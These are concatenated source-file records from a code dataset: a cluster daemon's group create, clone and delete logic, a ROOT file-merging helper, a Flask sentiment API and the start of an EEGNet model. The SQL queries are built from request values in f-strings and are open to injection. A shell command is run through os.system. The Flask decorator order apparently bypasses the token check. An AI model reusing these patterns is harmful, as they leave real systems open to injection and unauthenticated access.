'BOOTIF',\n 'network': 
controller[0]['network']\n })\n create = True\n\n # we reset to make sure we don't assing something that won't work\n if 'osimage' in data:\n data['osimagetagid'] = \"default\"\n\n for key, value in items.items():\n if key in data:\n data[key] = data[key]\n if isinstance(value, bool):\n data[key] = str(Helper().bool_to_string(data[key]))\n elif create:\n data[key] = value\n if isinstance(value, bool):\n data[key] = str(Helper().bool_to_string(data[key]))\n if key in data and (not data[key]) and (key not in items):\n del data[key]\n\n if 'bmcsetupname' in data:\n bmcsetupname = data['bmcsetupname']\n data['bmcsetupid'] = Database().id_by_name('bmcsetup', data['bmcsetupname'])\n if data['bmcsetupid']:\n del data['bmcsetupname']\n else:\n status=False\n return status, f'BMC Setup {bmcsetupname} does not exist'\n if 'osimage' in data:\n osimage = data['osimage']\n data['osimageid'] = Database().id_by_name('osimage', osimage)\n if data['osimageid']:\n del data['osimage']\n else:\n status=False\n return status, f'OSimage {osimage} does not exist'\n\n new_interface = None\n if 'interfaces' in data:\n new_interface = data['interfaces']\n del data['interfaces']\n\n if 'osimagetag' in data:\n osimagetag = data['osimagetag']\n del data['osimagetag']\n if osimagetag == \"\":\n data['osimagetagid'] = \"\"\n else:\n osimagetagids = None\n if 'osimageid' in data:\n osimagetagids = Database().get_record(None, 'osimagetag', f\" WHERE osimageid = '{data['osimageid']}' AND name = '{osimagetag}'\")\n elif group and 'osimageid' in group[0]:\n osimagetagids = Database().get_record(None, 'osimagetag', f\" WHERE osimageid = '{group[0]['osimageid']}' AND name = '{osimagetag}'\")\n if osimagetagids:\n data['osimagetagid'] = osimagetagids[0]['id']\n else:\n status = False\n return status, 'Unknown tag, or osimage and tag not related'\n\n group_columns = Database().get_columns('group')\n column_check = Helper().compare_list(data, group_columns)\n if column_check:\n if update:\n where = [{\"column\": \"id\", \"value\": group_id}]\n row = Helper().make_rows(data)\n Database().update('group', row, where)\n response = f'Group {name} updated successfully'\n status=True\n if create:\n data['name'] = name\n row = Helper().make_rows(data)\n group_id = Database().insert('group', row)\n response = f'Group {name} created successfully'\n status=True\n if new_interface:\n for ifx in new_interface:\n if not 'interface' in ifx:\n status=False\n return status, 'Interface name is required for this operation'\n interface_name = ifx['interface']\n network = None\n if not 'network' in ifx:\n nwk=Database().get_record_join(\n ['network.name as network', 'network.id as networkid'],\n [\n 'network.id=groupinterface.networkid',\n 'groupinterface.groupid=group.id'\n ],\n [\n f\"`group`.name='{name}'\",\n f\"groupinterface.interface='{interface_name}'\"\n ]\n )\n if nwk and 'networkid' in nwk[0]:\n network=nwk[0]['networkid']\n else:\n network = Database().id_by_name('network', ifx['network'])\n del ifx['network']\n if network is None:\n status=False\n return status, 'Network not provided or does not exist'\n else:\n ifx['networkid'] = network\n ifx['groupid'] = group_id\n group_clause = f'groupid = \"{group_id}\"'\n # network_clause = f'networkid = \"{network}\"'\n interface_clause = f'interface = \"{interface_name}\"'\n where = f' WHERE {group_clause} AND {interface_clause}'\n # where += f' AND {interface_clause}'\n check_interface = Database().get_record(None, 'groupinterface', where)\n result, queue_id = None, None\n if not 
check_interface:\n row = Helper().make_rows(ifx)\n result = Database().insert('groupinterface', row)\n self.logger.info(f'Interface created => {result} .')\n queue_id, _ = Queue().add_task_to_queue(\n f'add_interface_to_group_nodes:{name}:{interface_name}',\n 'group_interface'\n )\n else: # we update only\n row = Helper().make_rows(ifx)\n where = [\n {\"column\": \"groupid\", \"value\": group_id},\n {\"column\": \"interface\", \"value\": interface_name}\n ]\n result = Database().update('groupinterface', row, where)\n self.logger.info(f'Interface updated => {result} .')\n queue_id, _ = Queue().add_task_to_queue(\n f'update_interface_for_group_nodes:{name}:{interface_name}',\n 'group_interface'\n )\n # below section takes care(in the background) the adding/renaming/deleting.\n # for adding next free ip-s will be selected. time consuming there for\n # background\n if result:\n next_id = Queue().next_task_in_queue('group_interface')\n if queue_id == next_id:\n executor = ThreadPoolExecutor(max_workers=1)\n executor.submit(Config().update_interface_on_group_nodes,name)\n executor.shutdown(wait=False)\n # Config().update_interface_on_group_nodes(name)\n\n # ---- we call the group plugin - maybe someone wants to run something after create/update?\n nodes_in_group = []\n group_details=Database().get_record_join(['node.name AS nodename'],['node.groupid=group.id'],[f\"`group`.name='{name}'\"])\n if group_details:\n for group_detail in group_details:\n nodes_in_group.append(group_detail['nodename'])\n group_plugins = Helper().plugin_finder(f'{self.plugins_path}/group')\n group_plugin=Helper().plugin_load(group_plugins,'group','default')\n try:\n if oldgroupname and newgroupname:\n group_plugin().rename(name=oldgroupname, newname=newgroupname)\n elif create:\n group_plugin().postcreate(name=name, nodes=nodes_in_group)\n elif update:\n group_plugin().postupdate(name=name, nodes=nodes_in_group)\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n\n else:\n status=False\n response = 'Invalid request: Columns are incorrect'\n else:\n status=False\n response = 'Invalid request: Did not receive data'\n return status, response\n\n\n def clone_group(self, name=None, request_data=None):\n \"\"\"\n This method will clone a group.\n \"\"\"\n data = {}\n status=False\n response=\"Internal error\"\n # things we have to set for a group\n items = {\n 'prescript': '',\n 'partscript': '',\n 'postscript': '',\n 'setupbmc': False,\n 'netboot': True,\n 'localinstall': False,\n 'bootmenu': False,\n }\n if request_data:\n newgroupname = None\n data = request_data['config']['group'][name]\n grp = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if grp:\n group_id = grp[0]['id']\n if 'newgroupname' in data:\n newgroupname = data['newgroupname']\n where = f' WHERE `name` = \"{newgroupname}\"'\n check_group = Database().get_record(None, 'group', where)\n if check_group:\n status=False\n return status, f'{newgroupname} Already present in database'\n data['name'] = data['newgroupname']\n del data['newgroupname']\n else:\n status=False\n return status, 'Destination group name not supplied'\n else:\n status=False,\n return status, f'Source group {name} does not exist'\n\n del grp[0]['id']\n for item in grp[0]:\n if item in data:\n data[item] = data[item]\n if item in items and isinstance(items[item], bool):\n data[item]=str(Helper().bool_to_string(data[item]))\n else:\n data[item] = grp[0][item]\n if item in items and isinstance(items[item], bool):\n data[item]=str(Helper().bool_to_string(data[item]))\n 
if item in items:\n data[item] = data[item] or items[item]\n if item in items and isinstance(items[item], bool):\n data[item]=str(Helper().bool_to_string(data[item]))\n if (not data[item]) and (item not in items):\n del data[item]\n if 'bmcsetupname' in data:\n bmcsetupname = data['bmcsetupname']\n data['bmcsetupid'] = Database().id_by_name('bmcsetup', data['bmcsetupname'])\n if data['bmcsetupid']:\n del data['bmcsetupname']\n else:\n status=False\n return status, f'BMC Setup {bmcsetupname} does not exist'\n if 'osimage' in data:\n osimage = data['osimage']\n del data['osimage']\n data['osimageid'] = Database().id_by_name('osimage', osimage)\n new_interface = None\n if 'interfaces' in data:\n new_interface = data['interfaces']\n del data['interfaces']\n group_columns = Database().get_columns('group')\n column_check = Helper().compare_list(data, group_columns)\n if column_check:\n row = Helper().make_rows(data)\n new_group_id = Database().insert('group', row)\n if not new_group_id:\n status=False\n return status, f'Group {newgroupname} is not created due to possible property clash'\n # response = f'Group {name} created successfully'\n response = f'Group {name} cloned as {newgroupname} successfully'\n status=True\n group_interfaces = Database().get_record_join(\n [\n 'groupinterface.interface',\n 'network.name as network',\n 'network.id as networkid',\n 'groupinterface.options'\n ],\n ['network.id=groupinterface.networkid'],\n [f\"groupid = '{group_id}'\"]\n )\n\n # ------ secrets ------\n secrets = Database().get_record(None, 'groupsecrets', f' WHERE groupid = \"{group_id}\"')\n for secret in secrets:\n del secret['id']\n secret['groupid'] = new_group_id\n row = Helper().make_rows(secret)\n result = Database().insert('groupsecrets', row)\n if not result:\n self.delete_group(new_group_id)\n status=False\n return status, f'Secrets copy for {newgroupname} failed'\n\n # ------ interfaces -------\n if new_interface:\n for ifx in new_interface:\n interface_name = ifx['interface']\n index = 0\n for grp_ifx in group_interfaces:\n # delete interfaces we already have\n if interface_name == grp_ifx['interface']:\n del group_interfaces[index]\n index += 1\n for ifx in new_interface:\n interface_name = ifx['interface']\n if 'network' not in ifx:\n status=False\n response=f'Network not specified for interface {interface_name}'\n break\n network = Database().id_by_name('network', ifx['network'])\n if network is None:\n status=False\n response=f'Network {network} does not exist'\n break\n else:\n ifx['networkid'] = network\n if 'options' in ifx:\n ifx['options'] = ifx['options'] or \"\"\n ifx['groupid'] = new_group_id\n del ifx['network']\n row = Helper().make_rows(ifx)\n Database().insert('groupinterface', row)\n\n if status is False:\n # rollback\n self.delete_group(new_group_id)\n return status, response\n\n for ifx in group_interfaces:\n ifx['groupid'] = new_group_id\n del ifx['network']\n row = Helper().make_rows(ifx)\n Database().insert('groupinterface', row)\n\n # ---- we call the group plugin - maybe someone wants to run something after clone?\n nodes_in_group = []\n group_details=Database().get_record_join(['node.name AS nodename'],['node.groupid=group.id'],[f\"`group`.name='{newgroupname}'\"])\n if group_details:\n for group_detail in group_details:\n nodes_in_group.append(group_detail['nodename'])\n group_plugins = Helper().plugin_finder(f'{self.plugins_path}/group')\n group_plugin=Helper().plugin_load(group_plugins,'group','default')\n try:\n group_plugin().postcreate(name=newgroupname, 
nodes=nodes_in_group)\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n else:\n response = 'Invalid request: Columns are incorrect'\n status=False\n else:\n response = 'Invalid request: Did not receive data'\n status=False\n return status, response\n\n\n def delete_group_by_name(self, name=None):\n \"\"\"\n This method will delete a group by name.\n \"\"\"\n status=False\n response=f'Group {name} not present in database'\n where = f' WHERE `name` = \"{name}\"'\n group = Database().get_record(None, 'group', where)\n if group:\n status, response=self.delete_group(group[0]['id'])\n return status, response\n\n\n def delete_group(self, groupid=None):\n \"\"\"\n This method will delete a group.\n \"\"\"\n status=False\n where = f' WHERE `id` = \"{groupid}\"'\n group = Database().get_record(None, 'group', where)\n if group:\n name=group[0]['name']\n where = [{\"column\": \"id\", \"value\": groupid}]\n Database().delete_row('group', where)\n where = [{\"column\": \"groupid\", \"value\": group[0]['id']}]\n Database().delete_row('groupinterface', where)\n Database().delete_row('groupsecrets', where)\n response = f'Group {name} removed'\n status=True\n # ---- we call the group plugin - maybe someone wants to run something after delete?\n group_plugins = Helper().plugin_finder(f'{self.plugins_path}/group')\n group_plugin=Helper().plugin_load(group_plugins,'group','default')\n try:\n group_plugin().delete(name=name)\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n else:\n response = 'Group not present in database'\n status=False\n return status, response\n", "repo_name": "clustervision/luna2-daemon", "sub_path": "daemon/base/group.py", "file_name": "group.py", "file_ext": "py", "file_size_in_byte": 28577, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.log.Log.get_logger", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.log.Log", "line_number": 28, "usage_type": "name"}, {"api_name": "common.constant.CONSTANT", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.database.Database", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 53, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 54, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 55, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 57, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 60, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 91, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 96, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 115, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 120, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 129, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 140, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 143, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 147, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 171, "usage_type": "call"}, 
{"api_name": "utils.database.Database", "line_number": 176, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 217, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 224, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 237, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 259, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 263, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 269, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 277, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 297, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 299, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 306, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 307, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 311, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 312, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 317, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 318, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 329, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 343, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 356, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 359, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 360, "usage_type": "call"}, {"api_name": "utils.queue.Queue", "line_number": 362, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 367, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 372, "usage_type": "call"}, {"api_name": "utils.queue.Queue", "line_number": 374, "usage_type": "call"}, {"api_name": "utils.queue.Queue", "line_number": 382, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 384, "usage_type": "call"}, {"api_name": "utils.config.Config", "line_number": 385, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 391, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 395, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 396, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 436, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 442, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 460, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 464, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 468, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 473, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 482, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 487, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 488, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 490, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 491, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 498, "usage_type": "call"}, {"api_name": "utils.database.Database", 
"line_number": 510, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 514, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 515, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 537, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 548, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 549, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 559, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 560, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 564, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 568, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 569, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 590, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 602, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 606, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 608, "usage_type": "call"}, {"api_name": "utils.database.Database", "line_number": 609, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 613, "usage_type": "call"}, {"api_name": "utils.helper.Helper", "line_number": 614, "usage_type": "call"}]} +{"seq_id": "20276586436", "text": "from __future__ import print_function\n\nimport os\nfrom builtins import input\nfrom builtins import map\nfrom functools import partial\nfrom multiprocessing import Pool\n\nfrom PyAnalysisTools.base.ShellUtils import move, remove_directory, make_dirs\n\n\ndef parallel_merge(data, output_path, prefix, merge_dir=None, force=False, postfix=None, ncpu=10):\n make_dirs(output_path)\n make_dirs(merge_dir)\n if merge_dir is None:\n merge_dir = output_path\n if len(os.listdir(merge_dir)) > 0:\n do_delete = input(\"Merge directory contains already files. Shall I delete those?: [y|n]\")\n if do_delete.lower() == \"y\" or do_delete.lower() == \"yes\":\n list([remove_directory(os.path.join(merge_dir, d)) for d in os.listdir(merge_dir)])\n\n pool = Pool(processes=min(ncpu, len(data)))\n pool.map(partial(parallel_merge_wrapper, output_path=output_path, prefix=prefix,\n merge_dir=merge_dir, force=force, postfix=postfix), data.items())\n\n\ndef parallel_merge_wrapper(dict_element, output_path, prefix, merge_dir=None, force=False, postfix=None):\n process, input_file_list = dict_element\n if merge_dir is not None:\n merge_dir = os.path.join(merge_dir, process)\n merge_files(input_file_list, output_path, prefix + \"{:s}\".format(process), merge_dir, force, postfix)\n\n\ndef merge_files(input_file_list, output_path, prefix, merge_dir=None, force=False, postfix=None):\n def build_buckets(file_list):\n limit = 2. * 1024. * 1024. 
* 1024.\n if sum(map(os.path.getsize, file_list)) < limit:\n return [file_list]\n bucket_list = []\n tmp = []\n summed_file_size = 0.\n for file_name in file_list:\n if summed_file_size > limit:\n summed_file_size = 0.\n bucket_list.append(tmp)\n tmp = []\n summed_file_size += os.path.getsize(file_name)\n tmp.append(file_name)\n bucket_list.append(tmp)\n return bucket_list\n\n def merge(file_lists):\n import time\n time.sleep(2)\n if len([f for chunk in file_lists for f in chunk]) == 0:\n return\n for file_list in file_lists:\n merge_cmd = 'nice -n 15 hadd '\n if force:\n merge_cmd += ' -f '\n if postfix is not None:\n output_file_name = '{:s}_{:d}.{:s}.root'.format(prefix, file_lists.index(file_list), postfix)\n else:\n output_file_name = '{:s}_{:d}.root'.format(prefix, file_lists.index(file_list))\n merge_cmd += '%s %s' % (output_file_name, ' '.join(file_list))\n if not force and os.path.exists(os.path.join(output_path, output_file_name)):\n continue\n os.system(merge_cmd)\n if not merge_dir == output_path:\n move(output_file_name, os.path.join(output_path, output_file_name))\n\n def setup_paths(merge_dir):\n if not os.path.exists(output_path):\n make_dirs(output_path)\n if merge_dir is None:\n merge_dir = output_path\n else:\n merge_dir = os.path.abspath(merge_dir)\n make_dirs(merge_dir)\n os.chdir(merge_dir)\n\n buckets = build_buckets(input_file_list)\n setup_paths(merge_dir)\n merge(buckets)\n if merge_dir is not None:\n remove_directory(os.path.abspath(merge_dir))\n", "repo_name": "morgenst/PyAnalysisTools", "sub_path": "PyAnalysisTools/base/IOTools.py", "file_name": "IOTools.py", "file_ext": "py", "file_size_in_byte": 3368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 13, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 14, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 17, "usage_type": "call"}, {"api_name": "builtins.input", "line_number": 18, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.remove_directory", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 22, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "builtins.map", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.system", "line_number": 68, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.move", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": 
"os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 79, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 80, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.remove_directory", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}]} +{"seq_id": "23209181395", "text": "from flask import Blueprint, request, jsonify\n\nfrom logging_setup.logger import ApiLogger\nfrom ..application.application_api import app_token_required\nfrom .sentiment_handlers import add_new_sentiment as sh\nfrom .models.UserOverallSentiments import UserOverallSentiments\nfrom .models.UserInteractionSentiment import UserInteractionSentiment\n\nsentiment_bp = Blueprint(\n \"sentiment_api\", \n __name__,\n url_prefix='/sentiment',\n template_folder='templates/sentiment')\n\n@app_token_required\n@sentiment_bp.route(\"/\", methods=['POST'])\ndef get_user_sentiment(userid, contentid):\n flow_id = \"get_user_sentiments\".upper()\n try:\n contentid = request.args.get('contentid', default=None, type=str)\n towardsuserid = request.args.get(\n 'towardsuserid', default=None, type=str)\n\n ApiLogger.log_debug(flow_id, \"Fetching overall sentiments for \",\n f\"User_sentiment - parameters userid: {userid} contentid: {contentid}\")\n if contentid == None:\n return jsonify(UserOverallSentiments.get_user_sentiment(userid))\n\n return jsonify(UserInteractionSentiment.get_user_sentiment_for_content(userid, contentid, towardsuserid))\n except:\n ApiLogger.log_exception(flow_id, \"Api exception\", \"\")\n raise\n\n@app_token_required\n@sentiment_bp.route(\"/\", methods=['POST'])\ndef set_user_sentiment():\n try:\n flow_id = \"set_user_sentiments\".upper()\n req = request\n ApiLogger.log_debug(flow_id, \"Api Begin\",\n f\"set user sentiments - {request.json}\")\n return jsonify(sh.set_user_sentiment(request.json, flow_id))\n except:\n ApiLogger.log_exception(flow_id, \"Api exception\", \"\")\n raise\n\n@app_token_required\n@sentiment_bp.route(\"/check\", methods=['POST'])\ndef analyze_sentiment():\n try:\n flow_id = \"Analyze_sentiment\".upper()\n ApiLogger.log_debug(flow_id, \"Api Begin\", f\"{request.json}\")\n\n return jsonify(sh.get_sentiments_of_content(request.json, flow_id))\n except:\n ApiLogger.log_exception(flow_id, \"Api exception\", \"\")\n raise\n", "repo_name": "Pbasnal/flask-twitterclone", "sub_path": "api/blueprints/sentiment/sentiment_api.py", "file_name": "sentiment_api.py", "file_ext": "py", "file_size_in_byte": 2109, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 21, 
"usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_debug", "line_number": 24, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 27, "usage_type": "call"}, {"api_name": "models.UserOverallSentiments.UserOverallSentiments.get_user_sentiment", "line_number": 27, "usage_type": "call"}, {"api_name": "models.UserOverallSentiments.UserOverallSentiments", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 29, "usage_type": "call"}, {"api_name": "models.UserInteractionSentiment.UserInteractionSentiment.get_user_sentiment_for_content", "line_number": 29, "usage_type": "call"}, {"api_name": "models.UserInteractionSentiment.UserInteractionSentiment", "line_number": 29, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_exception", "line_number": 31, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 31, "usage_type": "name"}, {"api_name": "application.application_api.app_token_required", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_debug", "line_number": 40, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 42, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment.set_user_sentiment", "line_number": 42, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_exception", "line_number": 44, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 44, "usage_type": "name"}, {"api_name": "application.application_api.app_token_required", "line_number": 34, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_debug", "line_number": 52, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 54, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment.get_sentiments_of_content", "line_number": 54, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_exception", "line_number": 56, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 56, "usage_type": "name"}, {"api_name": "application.application_api.app_token_required", "line_number": 47, "usage_type": "name"}]} +{"seq_id": 
"13874924436", "text": "import torch\nimport scipy.io as sio\nimport numpy as np\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\nimport mne\n\nfrom scipy.integrate import simps\nfrom mne.time_frequency import psd_array_multitaper\n\nfrom torch.optim.lr_scheduler import StepLR, ReduceLROnPlateau\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.autograd import Variable\nfrom torch.utils.tensorboard import SummaryWriter\nfrom matplotlib.collections import LineCollection\nimport matplotlib.gridspec as gridspec\nfrom adhd_classification import data_load\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score, precision_score, recall_score, accuracy_score,confusion_matrix,roc_curve,f1_score\n\nfrom electrodes_positions import get_electrodes_coordinates, set_electrodes_montage, get_electrodes_positions\nfrom early_stopping import EarlyStopping\nPATH_DATASET_MAT= r\"C:\\Users\\Ahmed Guebsi\\Downloads\\ADHD_part1\"\n\n\ntorch.cuda.empty_cache()\ntorch.manual_seed(0)\nnp.random.seed(0)\nplt.rcParams.update({'font.size': 14})\n\n\nclass EEGNet(torch.nn.Module):\n def __init__(self, channelnum=19):\n super(EEGNet, self).__init__()\n\n # model parameters\n self.eps = 1e-05\n\n self.f1 = 8\n self.d = 2\n self.conv1 = torch.nn.Conv2d(1, self.f1, (1, 64), padding=(0, 32), bias=False)\n self.batchnorm1 = torch.nn.BatchNorm2d(self.f1, track_running_stats=False)\n self.batchnorm2 = torch.nn.BatchNorm2d(self.f1 * self.d, track_running_stats=False)\n self.batchnorm3 = torch.nn.BatchNorm2d(self.f1 * self.d, track_running_stats=False)\n self.activ1 = torch.nn.ELU()\n self.activ2 = torch.nn.ELU()\n self.depthconv = torch.nn.Conv2d(self.f1, self.f1 * self.d, (19, 1), groups=self.f1, bias=False)\n self.avgpool = torch.nn.AvgPool2d((1, 4))\n self.separable = torch.nn.Conv2d(self.f1 * self.d, self.f1 * self.d, (1, 16), padding=(0, 8),\n groups=self.f1 * self.d, bias=False)\n self.fc1 = torch.nn.Linear(256, 2) # 128\n self.softmax = nn.LogSoftmax(dim=1)\n self.softmax1 = nn.Softmax(dim=1)\n self.dropout = nn.Dropout(p=0.5)\n\n # parameters for the interpretation techniques\n self.batch_mean1 = 0\n self.batch_std1 = 0\n self.gamma1 = 0\n self.beta1 = 0\n self.batch_mean2 = 0\n self.batch_std2 = 0\n self.gamma2 = 0\n self.beta2 = 0\n self.batch_mean3 = 0\n 